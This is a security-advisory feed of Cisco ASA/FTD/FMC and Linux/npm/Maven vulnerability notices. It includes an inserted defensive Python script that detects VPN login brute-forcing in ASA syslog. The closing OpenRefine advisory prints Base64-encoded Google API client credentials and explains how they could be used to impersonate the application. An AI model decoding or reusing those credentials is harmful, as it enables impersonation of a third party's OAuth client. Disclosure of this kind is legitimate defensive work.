["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-CMD-INJ-G8AOKNDP
23.10.2024 19:00:00cisco[CISCO-SA-FMC-CMD-INJ-2HBKA97G] Cisco Secure Firewall Management Center Software Command Injection Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker with Administrator-level privileges to execute arbitrary commands on the underlying operating system.This vulnerability is due to insufficient input validation of certain HTTP request parameters that are sent to the web-based management interface. An attacker could exploit this vulnerability by authenticating to the Cisco FMC web-based management interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute commands as the root user on the affected device. To exploit this vulnerability, an attacker would need Administrator-level credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-CMD-INJ-2HBKA97G
23.10.2024 19:00:00cisco[CISCO-SA-CSC-DOS-XVPHM3BJ] Cisco Secure Client Software Denial of Service Vulnerability (medium)A vulnerability in Internet Key Exchange version 2 (IKEv2) processing of Cisco Secure Client Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of Cisco Secure Client.This vulnerability is due to an integer underflow condition. An attacker could exploit this vulnerability by sending a crafted IKEv2 packet to an affected system. A successful exploit could allow the attacker to cause Cisco Secure Client Software to crash, resulting in a DoS condition on the client software.Note: Cisco Secure Client Software releases 4.10 and earlier were known as Cisco AnyConnect Secure Mobility Client.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CSC-DOS-XVPHM3BJ
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTDVIRTUAL-DOS-MUENGNYR] Cisco Adaptive Security Virtual Appliance and Secure Firewall Threat Defense Virtual SSL VPN Denial of Service Vulnerability (high)A vulnerability in the VPN and management web servers of the Cisco Adaptive Security Virtual Appliance (ASAv) and Cisco Secure Firewall Threat Defense Virtual (FTDv), formerly Cisco Firepower Threat Defense Virtual, platforms could allow an unauthenticated, remote attacker to cause the virtual devices to run out of system memory, which could cause SSL VPN connection processing to slow down and eventually cease altogether.This vulnerability is due to a lack of proper memory management for new incoming SSL/TLS connections on the virtual platforms. An attacker could exploit this vulnerability by sending a large number of new incoming SSL/TLS connections to the targeted virtual platform. A successful exploit could allow the attacker to deplete system memory, resulting in a denial of service (DoS) condition. The memory could be reclaimed slowly if the attack traffic is stopped, but a manual reload may be required to restore operations quickly.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTDVIRTUAL-DOS-MUENGNYR
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-XSS-YJJ7ZJVQ] Cisco Adaptive Security Appliance and Firepower Threat Defense Software VPN Web Client Services Cross-Site Scripting Vulnerabilities (medium)Multiple vulnerabilities in the VPN web client services feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a browser that is accessing an affected device. These vulnerabilities are due to improper validation of user-supplied input to application endpoints. An attacker could exploit these vulnerabilities by persuading a user to follow a link designed to submit malicious input to the affected application. A successful exploit could allow the attacker to execute arbitrary HTML or script code in the browser in the context of the web services page. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-XSS-YJJ7ZJVQ
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-WEBVPN-DOS-HONB9PH4] Cisco Adaptive Security Appliance and Firepower Threat Defense Software SSL VPN Memory Management Denial of Service Vulnerability (high)A vulnerability in the SSL VPN feature for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to a logic error in memory management when the device is handling SSL VPN connections. An attacker could exploit this vulnerability by sending crafted SSL/TLS packets to the SSL VPN server of the affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-WEBVPN-DOS-HONB9PH4
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-SNMP-DOS-7TCNZXTU] Cisco Adaptive Security Appliance and Firepower Threat Defense Software SNMP Denial of Service Vulnerability (high)A vulnerability in the Simple Network Management Protocol (SNMP) feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to cause an unexpected reload of the device. This vulnerability is due to insufficient input validation of SNMP packets. An attacker could exploit this vulnerability by sending a crafted SNMP request to an affected device using IPv4 or IPv6. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition. This vulnerability affects all versions of SNMP (versions 1, 2c, and 3) and requires a valid SNMP community string or valid SNMPv3 user credentials. For more information, see the Details ["#details"] section of this advisory. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-SNMP-DOS-7TCNZXTU
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-PERSIST-LCE-VU3EKMJ3] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability (high)A vulnerability in the VPN web server of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerability. This vulnerability is due to improper validation of a specific file when it is read from system flash memory. An attacker could exploit this vulnerability by restoring a crafted backup file to an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device after the next reload of the device, which could alter system behavior. Because the injected code could persist across device reboots, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-PERSIST-LCE-VU3EKMJ3
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-NSGACL-BYPASS-77XNEASL] Cisco Adaptive Security Appliance and Firepower Threat Defense Software NSG Access Control List Bypass Vulnerability (medium)A vulnerability in the Network Service Group (NSG) feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access control list (ACL) and allow traffic that should be denied to flow through an affected device. This vulnerability is due to a logic error that occurs when NSG ACLs are populated on an affected device. An attacker could exploit this vulnerability by establishing a connection to the affected device. A successful exploit could allow the attacker to bypass configured ACL rules. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-NSGACL-BYPASS-77XNEASL
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-IKEV2-DOS-9FGEYHSF] Cisco Adaptive Security Appliance and Firepower Threat Defense Software IKEv2 VPN Denial of Service Vulnerability (high)A vulnerability in the Internet Key Exchange version 2 (IKEv2) protocol for VPN termination of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted IKEv2 traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-IKEV2-DOS-9FGEYHSF
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-DAP-DOS-BHEKP7N] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Dynamic Access Policies Denial of Service Vulnerability (high)A vulnerability in the Dynamic Access Policies (DAP) feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to cause an affected device to reload unexpectedly. To exploit this vulnerability, an attacker would need valid remote access VPN user credentials on the affected device. This vulnerability is due to improper validation of data in HTTPS POST requests. An attacker could exploit this vulnerability by sending a crafted HTTPS POST request to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-DAP-DOS-BHEKP7N
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-BF-DOS-VDZHLQRW] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access VPN Brute Force Denial of Service Vulnerability (medium)A vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of the RAVPN service. This vulnerability is due to resource exhaustion. An attacker could exploit this vulnerability by sending a large number of VPN authentication requests to an affected device. A successful exploit could allow the attacker to exhaust resources, resulting in a DoS of the RAVPN service on the affected device. Depending on the impact of the attack, a reload of the device may be required to restore the RAVPN service. Services that are not related to VPN are not affected. Cisco Talos discussed these attacks in the blog post Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials ["https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/"]. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-BF-DOS-VDZHLQRW
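Detection logic for the pattern the brute-force advisory above describes, added here as an example that is not part of the Cisco advisory: it reads ASA/FTD syslog lines, counts "AAA user authentication Rejected" messages per source address inside a sliding window, and flags sources that cross a threshold. The log lines are constructed; the message IDs %ASA-6-113005 and %ASA-6-113015 and their field layout are assumptions taken from Cisco's ASA syslog documentation, so check them against what your own headend emits before relying on the regex.

```python
"""Flag sources hammering a Cisco ASA/FTD remote-access VPN with failed logins.

Added example, not part of the Cisco advisory. The log lines are constructed;
the message IDs %ASA-6-113005 / %ASA-6-113015 and their field layout are
assumed from Cisco's ASA syslog documentation, so check them against what
your own headend emits before trusting the regex.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed layout of the two "AAA user authentication Rejected" messages.
REJECT_RE = re.compile(
    r"%(?:ASA|FTD)-\d-(?P<msgid>113005|113015):.*?"
    r"user = (?P<user>[^:\s]+)\s*:\s*user IP = (?P<ip>[0-9A-Fa-f.:]+)"
)
TS_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2})")
YEAR = 2024                      # BSD syslog stamps carry no year; assumed
WINDOW = timedelta(seconds=60)   # sliding window
THRESHOLD = 5                    # rejects per source inside WINDOW

# Constructed sample: one source cycles through usernames, one real user mistypes once.
SAMPLE_LINES = [
    "Oct 23 19:00:01 asa01 %ASA-6-302013: Built inbound TCP connection 1234 for outside:198.51.100.7/51000 (198.51.100.7/51000) to identity:203.0.113.1/443 (203.0.113.1/443)",
    "Oct 23 19:00:02 asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Unspecified : server = 10.0.0.5 : user = admin : user IP = 198.51.100.7",
    "Oct 23 19:00:05 asa01 %ASA-6-113015: AAA user authentication Rejected : reason = User was not found : local database : user = test : user IP = 198.51.100.7",
    "Oct 23 19:00:09 asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Unspecified : server = 10.0.0.5 : user = cisco : user IP = 198.51.100.7",
    "Oct 23 19:00:12 asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Unspecified : server = 10.0.0.5 : user = vpn : user IP = 198.51.100.7",
    "Oct 23 19:00:15 asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Unspecified : server = 10.0.0.5 : user = guest : user IP = 198.51.100.7",
    "Oct 23 19:00:20 asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Unspecified : server = 10.0.0.5 : user = alice : user IP = 203.0.113.9",
    "Oct 23 19:00:24 asa01 %ASA-6-113004: AAA user authentication Successful : server = 10.0.0.5 : user = alice",
    "Oct 23 19:00:31 asa01 %ASA-6-113005: AAA user authentication Rejected : reason = Unspecified : server = 10.0.0.5 : user = root : user IP = 198.51.100.7",
]


def parse_reject(line):
    """Return (timestamp, source_ip, user) for an auth-reject line, else None."""
    m_ts = TS_RE.match(line)
    m = REJECT_RE.search(line)
    if not (m_ts and m):
        return None
    ts = datetime.strptime(f"{YEAR} {m_ts['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["ip"], m["user"]


def find_bruteforce_sources(lines, window=WINDOW, threshold=THRESHOLD):
    """Sliding-window count of rejects per source IP over time-ordered lines.

    Returns {ip: (rejects_in_window, distinct_users_seen)} for every source
    that reaches `threshold` rejects inside `window`.
    """
    recent = defaultdict(deque)   # ip -> reject timestamps still in the window
    users = defaultdict(set)      # ip -> usernames tried
    flagged = {}
    for line in lines:
        parsed = parse_reject(line)
        if parsed is None:
            continue
        ts, ip, user = parsed
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = (len(q), len(users[ip]))
    return flagged


if __name__ == "__main__":
    for ip, (n, distinct) in find_bruteforce_sources(SAMPLE_LINES).items():
        print(f"{ip}: {n} rejects in {WINDOW.seconds}s across {distinct} usernames")
```

Feed it the headend's syslog stream in time order; the window and threshold are tuning knobs. A flagged source that spreads its attempts over many usernames is the password-spraying shape Talos describes, and blocking or rate-limiting it upstream of the headend is the only relief available, since the advisory states there is no workaround on the device itself.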
23.10.2024 19:00:00cisco[CISCO-SA-ASAFTD-ACL-BYPASS-VVNLNKQF] Cisco Adaptive Security Appliance and Firepower Threat Defense Software AnyConnect Access Control List Bypass Vulnerabilities (medium)Multiple vulnerabilities in the AnyConnect firewall for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access control list (ACL) and allow traffic that should have been denied to flow through an affected device. These vulnerabilities are due to a logic error in populating group ACLs when an AnyConnect client establishes a new session toward an affected device. An attacker could exploit these vulnerabilities by establishing an AnyConnect connection to the affected device. A successful exploit could allow the attacker to bypass configured ACL rules. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-ACL-BYPASS-VVNLNKQF
23.10.2024 19:00:00cisco[CISCO-SA-ASA-VPN-NYH3FHP] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access SSL VPN Authentication Targeted Denial of Service Vulnerability (medium)A vulnerability in the session authentication functionality of the Remote Access SSL VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to prevent users from authenticating. This vulnerability is due to insufficient entropy in the authentication process. An attacker could exploit this vulnerability by determining the handle of an authenticating user and using it to terminate their authentication session. A successful exploit could allow the attacker to force a user to restart the authentication process, preventing a legitimate user from establishing remote access VPN sessions. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-VPN-NYH3FHP
23.10.2024 19:00:00cisco[CISCO-SA-ASA-VPN-CZF8GT] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access VPN Denial of Service Vulnerability (high)A vulnerability in the Remote Access VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition on an affected device. This vulnerability is due to improper validation of client key data after the TLS session is established. An attacker could exploit this vulnerability by sending a crafted key value to an affected system over the secure TLS session. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-VPN-CZF8GT
23.10.2024 19:00:00cisco[CISCO-SA-ASA-VPN-4GYEWMKG] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access SSL VPN Authentication Targeted Denial of Service Vulnerability (medium)A vulnerability in the login authentication functionality of the Remote Access SSL VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to deny further VPN user authentications for several minutes, resulting in a temporary denial of service (DoS) condition. This vulnerability is due to ineffective handling of memory resources during the authentication process. An attacker could exploit this vulnerability by sending crafted packets, which could cause resource exhaustion of the authentication process. A successful exploit could allow the attacker to deny authentication for Remote Access SSL VPN users for several minutes, resulting in a temporary DoS condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-VPN-4GYEWMKG
23.10.2024 19:00:00cisco[CISCO-SA-ASA-TLS-CWY6ZXB] Cisco Adaptive Security Appliance and Firepower Threat Defense Software TLS Denial of Service Vulnerability (high)A vulnerability in the TLS cryptography functionality of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper data validation during the TLS 1.3 handshake. An attacker could exploit this vulnerability by sending a crafted TLS 1.3 packet to an affected system through a TLS 1.3-enabled listening socket. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Note: This vulnerability can also impact the integrity of a device by causing VPN HostScan communication failures or file transfer failures when Cisco ASA Software is upgraded using Cisco Adaptive Security Device Manager (ASDM). Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-TLS-CWY6ZXB
23.10.2024 19:00:00cisco[CISCO-SA-ASA-SSH-RCE-GRAUPEUF] Cisco Adaptive Security Appliance Software SSH Remote Command Injection Vulnerability (critical)A vulnerability in the SSH subsystem of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to execute operating system commands as root. This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by submitting crafted input when executing remote CLI commands over SSH. A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges. An attacker with limited user privileges could use this vulnerability to gain complete control over the system. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-SSH-RCE-GRAUPEUF
23.10.2024 19:00:00cisco[CISCO-SA-ASA-SSH-DOS-EEDWU5RM] Cisco Adaptive Security Appliance Software SSH Server Resource Denial of Service Vulnerability (medium)A vulnerability in the SSH server of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition for the SSH server of an affected device. This vulnerability is due to a logic error when an SSH session is established. An attacker could exploit this vulnerability by sending crafted SSH messages to an affected device. A successful exploit could allow the attacker to exhaust available SSH resources on the affected device so that new SSH connections to the device are denied, resulting in a DoS condition. Existing SSH connections to the device would continue to function normally. The device must be rebooted manually to recover. However, user traffic would not be impacted and could be managed using a remote application such as Cisco Adaptive Security Device Manager (ASDM). Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-SSH-DOS-EEDWU5RM
23.10.2024 19:00:00cisco[CISCO-SA-ASA-FTD-PRIV-ESC-HBS9GNWQ] Cisco Adaptive Security Appliance and Firepower Threat Defense Software FXOS CLI Root Privilege Escalation Vulnerability (medium)A vulnerability in the Cisco FXOS CLI feature on specific hardware platforms for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to elevate their administrative privileges to root. The attacker would need valid administrative credentials on the device to exploit this vulnerability. This vulnerability exists because certain system configurations and executable files have insecure storage and permissions. An attacker could exploit this vulnerability by authenticating on the device and then performing a series of steps that includes downloading malicious system files and accessing the Cisco FXOS CLI to configure the attack. A successful exploit could allow the attacker to obtain root access on the device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-FTD-PRIV-ESC-HBS9GNWQ
23.10.2024 09:46:51ubuntu[USN-7082-1] libheif vulnerability (high)libheif could be made to crash or read sensitive data if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7082-1
23.10.2024 05:47:42ubuntu[USN-7081-1] Go vulnerabilities (high)Several security issues were fixed in Go.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7081-1
23.10.2024 19:58:48npm[NPM:GHSA-M4GQ-X24J-JPMF] Prototype pollution vulnerability found in Mermaid's bundled version of DOMPurify (high)
The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.

This affects the built files:
- `dist/mermaid.min.js`
- `dist/mermaid.js`
- `dist/mermaid.esm.mjs`
- `dist/mermaid.esm.min.mjs`

This will also affect users that use the above files via a CDN link, e.g. `https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js`.

**Users that use the default NPM export of `mermaid`, e.g. `import mermaid from 'mermaid'`, or the `dist/mermaid.core.mjs` file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like `npm audit fix`.**

### Patches
- `develop` branch: 6c785c93166c151d27d328ddf68a13d9d65adc00
- backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M4GQ-X24J-JPMF
23.10.2024 17:58:53almalinux[ALSA-2024:8327] grafana security update (important)grafana security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8327
25.10.2024 05:09:17fedora[FEDORA-2024-9c84a7c963] Fedora 40: libtiff fix CVE-2024-7006 (rhbz#2302997); fix CVE-2023-52356 (rhbz#2260112); fix CVE-2023-6228 (rhbz#2251863).https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9c84a7c963
24.10.2024 21:32:41maven[MAVEN:GHSA-QFWQ-6JH6-8XX4] OpenRefine has a path traversal in LoadLanguageCommand (high)The load-language command expects a `lang` parameter from which it constructs the path of the localization file to load, of the form `translations-$LANG.json`. When doing so, it does not check that the resulting path is in the expected directory, which means that this command could be exploited to read other JSON files on the file system. The command should be patched by checking that the normalized path is in the expected directory.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QFWQ-6JH6-8XX4
24.10.2024 21:30:01maven[MAVEN:GHSA-3PG4-QWC8-426R] OpenRefine leaks Google API credentials in releases (high)
### Impact
OpenRefine releases contain Google API authentication keys ("client id" and "client secret") which can be extracted from released artifacts. For instance, download the package for OpenRefine 3.8.2 on Linux. It contains the file `openrefine-3.8.2/webapp/extensions/gdata/module/MOD-INF/lib/openrefine-gdata.jar`, which can be extracted.

This archive then contains the file `com/google/refine/extension/gdata/GoogleAPIExtension.java`, which contains the following lines:

```java
    // For a production release, the second parameter (default value) can be set
    // for the following three properties (client_id, client_secret, and API key) to
    // the production values from the Google API console
    private static final String CLIENT_ID = System.getProperty("ext.gdata.clientid",
            new String(Base64.getDecoder().decode("ODk1NTU1ODQzNjMwLWhkZWwyN3NxMDM5ZjFwMmZ0aGE2M2VvcWFpY2JwamZoLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29t")));
    private static final String CLIENT_SECRET = System.getProperty("ext.gdata.clientsecret",
            new String(Base64.getDecoder().decode("R2V2TnZiTnA2a3IxeDd5c3VZNENmYlNo")));
```

The Base64 encoding can then be decoded to obtain the client id and client secret. Those credentials can then be used by other applications to request access to Google accounts, pretending they are OpenRefine. This assumes that they also get access to the user access tokens, which this vulnerability doesn't expose by itself.

### Patches
